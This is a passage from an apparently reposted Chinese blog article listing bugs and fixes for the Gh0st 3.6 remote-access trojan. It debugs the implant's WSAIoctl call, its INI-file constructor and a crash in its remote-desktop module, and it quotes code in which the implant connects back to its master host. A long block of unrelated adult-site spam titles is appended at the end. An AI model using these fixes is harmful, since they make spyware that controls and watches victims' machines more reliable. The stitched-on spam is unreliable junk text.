style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li><li style="box-sizing: border-box; padding: 0px 5px;">11</li><li style="box-sizing: border-box; padding: 0px 5px;">12</li><li style="box-sizing: border-box; padding: 0px 5px;">13</li></ul>

    WSAIoctl 原型聲明如下:

    <code class="language-C hljs bash has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">int WSAAPI WSAIoctl( __<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">in</span> SOCKET s, __<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">in</span> DWORD dwIoControlCode, __<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">in</span>_bcount_opt(cbInBuffer) LPVOID lpvInBuffer, __<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">in</span> DWORD cbInBuffer, __out_bcount_part_opt(cbOutBuffer, *lpcbBytesReturned) LPVOID lpvOutBuffer, __<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">in</span> DWORD cbOutBuffer, __out LPDWORD lpcbBytesReturned, __inout_opt LPWSAOVERLAPPED lpOverlapped, __<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">in</span>_opt LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine );</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li><li style="box-sizing: border-box; padding: 0px 5px;">11</li></ul>

    ??倒數(shù)第三個參數(shù)應當是 LPDWORD 類型,而且是輸出,傳入的僅僅是char類型,雖然因為對齊 char 也分配了4字節(jié),不會導致棧覆蓋,但是在debug模式下系統(tǒng)加入了嚴苛的棧檢測機制:雖然分配了四字節(jié),因為是char類型,所以剩余的三字節(jié)是不應該修改的,在release下就沒有這問題。?
    修改為 LONG 類型即可解決問題:

    <code class="language-C hljs objectivec has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">unsigned</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">long</span> chOpt; *((<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">char</span> *)&chOpt) = <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span>;</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li></ul>

    ------------------------------------------------------------------------------------------------------------------------------------


    ------------------------------------------------------------------------------------------------------------------------------------

    10.CIniFile 構(gòu)造函數(shù)導致異常

    系統(tǒng)自動定義的一個對象

    <code class="language-C hljs cs has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"><span class="hljs-comment" style="color: rgb(136, 0, 0); box-sizing: border-box;">// 唯一的一個 ChostApp 對象</span> ChostApp theApp;</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li></ul>

    這個構(gòu)造函數(shù)應該是在最早執(zhí)行的,在 ChostApp 里面有一個成員

    <code class="language-C hljs has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">CIniFile m_IniFile;</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li></ul>

    所以要首先調(diào)用 CIniFile 的構(gòu)造函數(shù)

    <code class="language-C hljs objectivec has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">CIniFile::CIniFile(<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">void</span>) { <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">char</span> szAppName[MAX_PATH]; <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">int</span> len; HINSTANCE hinst; <span class="hljs-comment" style="color: rgb(136, 0, 0); box-sizing: border-box;">//hinst = AfxGetInstanceHandle();</span> ::GetModuleFileName(GetModuleHandle(<span class="hljs-literal" style="color: rgb(0, 102, 102); box-sizing: border-box;">NULL</span>), szAppName, <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">sizeof</span>(szAppName)); len = strlen(szAppName); }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li></ul>

    因為 AfxGetInstanceHandle() 調(diào)用導致異常。?
    具體可見CSDN論壇討論。

    ---------------------------------------------------------------------------------------------------------------------------------

    11.棧上對象多線程,析構(gòu)函數(shù)導致程序崩潰

    ??打開主控端。開啟被控端, 此時主控端顯示上線。

    ??在server端點擊桌面管理可以正常顯示被控端桌面,然后關閉遠程桌面,此時被控端出現(xiàn)一個錯誤:?
    TestDll.exe 中的 0x5950cc6f (server.dll) 處有未經(jīng)處理的異常: 0xC0000005: 讀取位置 0x02ecfca4 時發(fā)生訪問沖突

    <code class="hljs avrasm has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">nRet = m_pClient->Send((LPBYTE)lpData, nSize)<span class="hljs-comment" style="color: rgb(136, 0, 0); box-sizing: border-box;">;</span> <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">5950</span>CC64 <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">mov</span> eax,dword ptr [ebp+<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span>Ch] <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">5950</span>CC67 <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">push</span> eax <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">5950</span>CC68 <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">mov</span> ecx,dword ptr [ebp+<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">8</span>] <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">5950</span>CC6B <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">push</span> ecx <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">5950</span>CC6C <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">mov</span> edx,dword ptr [ebp-<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">18</span>h] <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">5950</span>CC6F <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">mov</span> ecx,dword ptr [edx+<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">4</span>] </code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li></ul>

    此時執(zhí)行到的指令位置是 5950CC6F

    對應的源代碼是

    <code class="language-C hljs r has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">int CManager::Send(LPBYTE lpData, UINT nSize) { int nRet = <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span>; <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">try</span> { nRet = m_pClient->Send((LPBYTE)lpData, nSize); }catch(<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">...</span>){}; <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">return</span> nRet; }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li></ul>

    寄存器edx的數(shù)值是?edx 0x02ecfca0 unsigned long

    ??奇怪的是在關閉遠程桌面以前這個函數(shù)執(zhí)行了很多次,都沒有出現(xiàn)這個問題。現(xiàn)在在關閉遠程桌面之后就這樣。通過對比發(fā)現(xiàn) 出現(xiàn)訪問異常的內(nèi)存 在關閉遠程桌面之后數(shù)值出現(xiàn)了變化。

    可以在關閉遠程桌面之后 vs2010下內(nèi)存訪問斷點,edx + 4 的位置

    <code class="hljs haskell has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"> 調(diào)試 -> 新建斷點 -> 新建內(nèi)存斷點</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li></ul>

    此時按F5發(fā)現(xiàn)中斷在manager類的析構(gòu)函數(shù)里面:

    <code class="language-C hljs mathematica has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">CManager::~CManager() <span class="hljs-list" style="box-sizing: border-box;">{ CloseHandle(m_hEventDlgOpen); }</span></code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li></ul>

    再看堆棧窗口 是從 Loop_ScreenManager 函數(shù)結(jié)尾調(diào)用而來的:

    <code class="language-C hljs lasso has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">DWORD WINAPI Loop_ScreenManager(SOCKET sRemote) { CClientSocket socketClient; <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">if</span> (<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">!</span>socketClient<span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">.</span>Connect(CKernelManager<span class="hljs-tag" style="color: rgb(0, 102, 102); box-sizing: border-box;">::m_strMasterHost</span>, CKernelManager<span class="hljs-tag" style="color: rgb(0, 102, 102); box-sizing: border-box;">::m_nMasterPort</span>)) <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">return</span> <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">-</span><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span>; CScreenManager manager(<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">&</span>socketClient); socketClient<span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">.</span>run_event_loop(); <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">return</span> <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span>; }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li><li style="box-sizing: border-box; padding: 0px 5px;">11</li><li style="box-sizing: border-box; padding: 0px 5px;">12</li></ul>

    ??這樣就大概分析出執(zhí)行流程:

    ??在上面函數(shù)中定義了一個CScreenManager類的對象manager,這個對象在棧中。CScreenManager基類是 CManager?
    當在主控端把遠程桌面關閉之后run_event_loop 會返回,這樣這個函數(shù)也就返回了,對象manager也就開始調(diào)用自己的析構(gòu)函數(shù),以前能訪問的現(xiàn)在也就不能訪問了。 所以就會出現(xiàn)上面的問題。

    ??其實在運行的時候CScreenManager類的構(gòu)造函數(shù)中創(chuàng)建了2個線程ControlThread ,WorkThread,當正常運行沒有調(diào)試器中斷的時候當函數(shù) Loop_ScreenManager 執(zhí)行完之后ControlThread 這個線程還未完全退出,不知道這樣會產(chǎn)生什么意外后果??

    ??經(jīng)過試驗在 函數(shù) Loop_ScreenManager結(jié)束之前加入 sleep(20) 可以解決這個問題。

    ------------------------------------------------------------------------------------------------------------------------------------



    未完待續(xù)。。。

    總結(jié)

    以上是生活随笔為你收集整理的Gh0st 3.6 存在的BUG及修改方法(收集整理)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

    国产免费又黄又爽 | 人人插人人爱 | 久久久人人人 | 国产精品成人自产拍在线观看 | 国产高清专区 | 日韩欧在线 | 日本爱爱片 | 国产香蕉97碰碰久久人人 | 久久草精品 | 亚洲精品国产麻豆 | 精品1区2区| 欧美日韩精品在线播放 | 永久免费视频国产 | www日| 成片视频在线观看 | 国产原厂视频在线观看 | 国产成人精品综合 | 在线欧美中文字幕 | 国产成人黄色av | 黄色网址a | 亚洲dvd| japanesexxx乱女另类 | 久久一区二区免费视频 | 欧美日韩国产伦理 | 亚洲极色 | 2021国产视频 | 欧美日韩一区二区久久 | 中文字幕一区二区在线播放 | 亚洲欧美视频在线 | 成人一区在线观看 | 欧洲亚洲精品 | 色五月成人 | 欧美色一色 | 婷色| 不卡av免费在线观看 | 国产精品自产拍在线观看中文 | 91视频首页 | 99在线精品视频在线观看 | 97操操操| 成人在线视频免费看 | 天天综合久久 | 国产精品一区二区在线 | 免费精品在线视频 | 天天色草| 日韩免费电影一区二区三区 | 欧美另类交人妖 | 欧美一级久久久久 | av电影不卡在线 | 麻豆国产在线视频 | 国产高清永久免费 | 日韩资源在线观看 | 99视频在线观看一区三区 | 黄色在线观看免费网站 | 91在线www| 天天操天天干天天玩 | 91高清免费看 | 欧美日韩亚洲国产一区 | 91探花视频 | 久久婷婷影视 | 三级黄色片在线观看 | 免费日韩 精品中文字幕视频在线 | 韩国精品视频在线观看 | av888av.com| 久久久久久久久久电影 | 92av视频| 久久久久久国产精品999 | 九九三级毛片 | 免费又黄又爽的视频 | av在线之家电影网站 | 国产精品久久久久久久午夜片 | a级国产片| 亚洲mv大片欧洲mv大片免费 | 久草视频免费在线播放 | 久久麻豆精品 | 亚洲一区二区天堂 | 五月婷婷av | 亚洲一区日韩精品 | 二区精品视频 | 久久人人爽av | 字幕网av | 国产精品亚洲片在线播放 | 97电院网手机版 | 四虎国产精品永久在线国在线 | 欧美日韩大片在线观看 | 欧美一区免费在线观看 | 欧美精品一区二区免费 | 在线免费国产 | 91麻豆看国产在线紧急地址 | av大片免费在线观看 | 国产精品一区二区免费视频 | 国产123av | 精品久久久亚洲 | 91香蕉视频 mp4 | 亚洲精品在线播放视频 | 美女av在线免费 | 免费观看一级 | 99精品久久精品一区二区 | 五月天久久精品 | 日韩av不卡播放 | 国产精品视频免费在线观看 | 国产美女永久免费 | 2024国产精品视频 | 91人人揉日日捏人人看 | 国产精品美女免费看 | 狠狠操天天操 | 91伊人久久大香线蕉蜜芽人口 | 国产一区在线精品 | 欧美aaaxxxx做受视频 | 久久久精品福利视频 | 欧美日韩国产在线观看 | 人人插人人草 | 国产v在线播放 | 九九精品在线观看 | 亚洲最新av网站 | 国产日韩欧美在线播放 | 国产91九色蝌蚪 | 黄污视频网站 | 天天干夜夜操视频 | 黄色毛片网站在线观看 | 91麻豆免费看 | 国产精品精品视频 | 五月婷婷久久综合 | 日韩欧美有码在线 | 黄色的视频 | 婷婷在线免费观看 | 久久免费99精品久久久久久 | 一区二区三区动漫 | 亚洲激情p| 亚洲精品2区| 国产h片在线观看 | 中文字幕中文字幕 | 日韩最新在线视频 | 蜜臀久久99精品久久久无需会员 | 色婷婷国产精品 | 亚洲精品福利在线 | 韩国av电影在线观看 | 欧美在线视频a | 日韩精品视频在线观看免费 | 成人av免费在线播放 | 国产91精品看黄网站 | 亚洲精品中文在线观看 | 国产91免费在线观看 | 日日爽视频 | av免费在线网站 | 808电影免费观看三年 | 成人在线免费视频观看 | 天天干夜夜夜操天 | 中文av影院 | 欧美性生活大片 | 婷婷丁香导航 | 国产经典 欧美精品 | 久久色视频| 国内少妇自拍视频一区 | 国产美女免费视频 | 91伊人久久大香线蕉蜜芽人口 | 国产91亚洲精品 | 亚洲作爱| 亚洲 欧美 精品 | 亚洲成av人影片在线观看 | 成人a级免费视频 | 四虎国产精品成人免费4hu | 欧美日韩精品在线观看视频 | 成人激情开心网 | 欧美a√大片 | 久久精品久久精品久久 | 久久精久久精 | 天天爽网站 | 色香天天| 国产系列 在线观看 | www日韩在线观看 | 天天艹天天 | 中文字幕久久精品一区 | 久久精品最新 | 国产黄在线播放 | 日韩av图片 | 国产黄色成人av | 久久国际影院 | 久久久久国产精品视频 | 日韩精品高清不卡 | 美女在线观看网站 | 中文资源在线观看 | 国精产品999国精产 久久久久 | 欧美一级黄色视屏 | 国产成人综 | 99热在线观看 | 91福利国产在线观看 | 91在线麻豆| 色开心 | 免费不卡中文字幕视频 | 欧美 激情 国产 91 在线 | 色综合久久久久综合 | 超碰人人99 | 中文字幕 二区 | 中文字幕 国产 一区 | 亚洲专区在线 | 久久1电影院 | 久久久精品在线观看 | 最近日本mv字幕免费观看 | 97在线资源| 久久综合九色 | 国产福利91精品张津瑜 | 中文免费 | 欧美日韩在线观看一区二区三区 | 91免费黄视频 | 国产亚洲资源 | 久久99精品国产99久久 | 精品一区电影国产 | 免费a v在线 | 午夜精品久久久久久中宇69 | 国产精品福利小视频 | 亚洲精品91天天久久人人 | 久久99精品国产99久久6尤 | 香蕉影视在线观看 | av电影一区二区 | 在线观看亚洲精品 | 国产精品婷婷 | 99九九免费视频 | 久久久国产精品久久久 | 色综合久久久 | 国产特级毛片aaaaaa | 欧美成人xxxx| 日韩有码在线播放 | 夜夜天天干 | 国产精品久久亚洲 | 成人黄大片 | 在线国产小视频 | 91.精品高清在线观看 | 国产色视频123区 | 国模精品在线 | 午夜精品99久久免费 | 日批视频在线观看免费 | 99热这里只有精品8 久久综合毛片 | 精品久久免费看 | 久久久国产精华液 | av免费网站观看 | 久久视频这里有久久精品视频11 | 日韩在线观看免费 | 免费人成在线观看网站 | 国产成人久 | 久久精品一区二区三区四区 | 日韩啪啪小视频 | 久产久精国产品 | 日韩中文字幕第一页 | 奇米影音四色 | 免费三级黄色片 | 97av在线视频免费播放 | 四虎免费在线观看视频 | 免费看久久久 | 在线免费观看国产 | 亚洲一区二区三区miaa149 | 久久久久免费视频 | 国产日产高清dvd碟片 | 五月婷婷六月丁香在线观看 | 五月花激情 | 在线观看精品黄av片免费 | 久久伊人精品天天 | 亚州精品天堂中文字幕 | 综合中文字幕 | 色婷婷综合久色 | 天天色天天 | 国产成人中文字幕 | 日韩三级视频在线观看 | 亚洲国产精品成人综合 | 播五月婷婷 | 欧美精品中文在线免费观看 | 精品女同一区二区三区在线观看 | 亚洲色图美腿丝袜 | 国产在线观看网站 | 操综合| 精品国产一二区 | 欧美疯狂性受xxxxx另类 | 日韩在线观看精品 | av看片在线 | 99热播精品 | 日韩久久久久久久久久久久 | 日日操天天射 | 手机av在线不卡 | 久久免费看a级毛毛片 | 免费看日韩片 | 麻豆系列在线观看 | 黄色官网在线观看 | 99精品国产免费久久久久久下载 | 99久久精品免费视频 | 免费视频区| 国产精品视频专区 | 人人澡人人舔 | 一级片视频在线 | 中文字幕中文字幕中文字幕 | 天天摸日日操 | 日韩小视频网站 | 国产不卡av在线播放 | 久久久久综合视频 | 天天干天天操天天入 | 国产精品久久综合 | 亚洲精品综合在线观看 | 亚洲aaa毛片 | 九九在线播放 | 成年人国产精品 | 国产高清日韩欧美 | 91免费网址 | 欧美精品久久久久久久免费 | 欧美一级视频免费看 | www色综合| 免费97视频 | 在线免费观看视频你懂的 | 97超碰在线免费观看 | 国产123区在线观看 国产精品麻豆91 | 免费麻豆网站 | 亚洲黄色大片 | 天天插天天爽 | 狠狠激情中文字幕 | 91成人网页版 | 日女人电影 | 激情综合色综合久久 | 免费在线播放黄色 | 日韩在线观看免费 | 香蕉视频在线观看免费 | av亚洲产国偷v产偷v自拍小说 | 日韩精品高清视频 | 亚洲 欧洲 国产 日本 综合 | 亚洲天堂精品 | 国产在线观看免 | 西西大胆啪啪 | 99久久久免费视频 | 草 免费视频 | 欧美一级在线 | 亚洲国产精品成人综合 | 亚洲资源在线观看 | 9在线观看免费 | 色999五月色 | 丁香六月网 | 日韩精品免费一区二区三区 | 国产精品mv在线观看 | 手机看国产毛片 | 亚洲视频 中文字幕 | 日韩欧美精品在线观看 | 99r在线播放 | 日日夜夜狠狠 | 国产日韩在线一区 | 成人av网站在线播放 | 亚洲91av| 亚洲精品久久久蜜臀下载官网 | 激情五月五月婷婷 | 日韩久久一区二区 | 波多野结衣一区 | av免费看看 | 男女啪啪网站 | 一级片免费在线 | 国产精品免费在线观看视频 | 亚洲激情 欧美激情 | 天天射网站 | 丁香av| 狠狠色丁香婷婷综合久小说久 | 久草网站 | 在线91播放 | 亚洲精品国产品国语在线 | 日韩av免费一区 | 91豆花在线观看 | 国产精品小视频网站 | 欧美黑人猛交 | 亚洲在线网址 | 亚洲精选在线观看 | 一区二区三区在线观看中文字幕 | 精品一区 在线 | 日韩国产欧美视频 | 亚洲草视频 | 精产嫩模国品一二三区 | 亚洲人精品午夜 | 久久黄色精品视频 | 91黄色在线看 | 国产玖玖精品视频 | 欧美一级片在线免费观看 | 波多野结衣在线视频免费观看 | 成人免费在线观看入口 | 国产高清精| 日韩在线二区 | 91在线视频免费播放 | 美女av免费看 | 免费久久片| 久久综合久久综合这里只有精品 | 国产一区二区视频在线 | 在线视频你懂 | 久久免费视频6 | 日韩首页 | 欧美国产高清 | 久久99精品久久久久久清纯直播 | 狠狠色狠狠色综合日日92 | 国产精品一区二区 91 | 91九色porny蝌蚪视频 | 久热超碰| 在线观看中文字幕第一页 | 欧美孕交vivoestv另类 | 欧美乱码精品一区 | 精品在线观看一区二区三区 | 91黄色在线观看 | 亚洲视频免费在线 | 五月婷婷在线观看视频 | 99久久久| 国产欧美日韩视频 | 丝袜护士aⅴ在线白丝护士 天天综合精品 | 日日综合 | 手机成人在线 | 日韩一级网站 | 麻豆视频网址 | 国产精品成人av电影 | av性在线| 成人久久精品 | 亚洲精品mv在线观看 | 有码视频在线观看 | 欧美色精品天天在线观看视频 | 99精品在线播放 | av一区二区三区在线播放 | 在线免费av网| av成人在线播放 | 99亚洲国产精品 | 精品视频在线播放 | 久久久久美女 | 国产97超碰| 久久影院中文字幕 | 亚洲人成在线电影 | 一区二区三区免费在线观看视频 | 免费97视频 | 啪啪免费观看网站 | 夜色在线资源 | 91av视频观看 | 人人精品| 日韩高清观看 | 色综合久久综合 | 日本精a在线观看 | 91在线小视频 | 国产精品久久久久免费 | 色99中文字幕 | 婷婷综合网 | 国产一区精品在线观看 | 精品一区免费 | 中文字幕电影高清在线观看 | a色视频 | 另类老妇性bbwbbw高清 | 18国产精品福利片久久婷 | 亚洲黄色激情小说 | 亚洲精品日韩av | 69热国产视频 | 久久高清免费视频 | 中文字幕网站视频在线 | 日韩色视频在线观看 | 欧美人牲 | 91资源在线观看 | 一区二区三区中文字幕在线 | 精品国产欧美一区二区 | 911久久| 欧美在线观看视频一区二区三区 | 在线观看免费日韩 | 久久一区91 | 色综合久久综合中文综合网 | 毛片播放网站 | 婷婷六月激情 | 色综合久久久久综合体 | 日本最新高清不卡中文字幕 | 欧美一区二区三区免费观看 | 国产精品久久久久一区二区三区 | 中文字幕亚洲综合久久五月天色无吗'' | 亚洲最大av网 | 久久激情影院 | 国产精品福利av | 国产日韩欧美在线免费观看 | 五月激情天 | 99国产一区二区三精品乱码 | 欧美成人亚洲 | 永久黄网站色视频免费观看w | 成人欧美日韩国产 | 免费国产在线精品 | 日韩在线一区二区免费 | 怡红院av | 亚洲成人av一区二区 | 欧美大荫蒂xxx| 韩国av免费在线 | 久久日韩精品 | 国内小视频 | 欧美日韩国产精品一区二区 | 日本中文字幕在线一区 | 国产精品 中文字幕 亚洲 欧美 | 一区免费视频 | 丁香婷婷激情国产高清秒播 | 超碰官网| 国产成人免费 | 深爱婷婷网 | 成人黄色中文字幕 | 81精品国产乱码久久久久久 | 色a在线观看 | 国产综合久久 | 精品视频在线播放 | 亚洲欧美视频 | 亚洲免费成人 | 日韩理论在线 | 中文字幕在线视频一区二区三区 | 美腿丝袜av | 成人中文字幕+乱码+中文字幕 | av成人在线网站 | 狠狠综合网 | 欧美极品少妇xbxb性爽爽视频 | 国产 字幕 制服 中文 在线 | www.日本色 | 久久国产福利 | 午夜精品一区二区三区在线视频 | 9色在线视频 | 午夜影院在线观看18 | 婷婷在线免费视频 | 午夜免费电影院 | 美女视频永久黄网站免费观看国产 | 国产精国产精品 | 五月天六月丁香 | 西西www444 | 久久极品 | 9在线观看免费高清完整 | 免费av大全| av日韩不卡| 夜夜躁日日躁狠狠久久av | 香蕉视频91 | 亚洲日本va在线观看 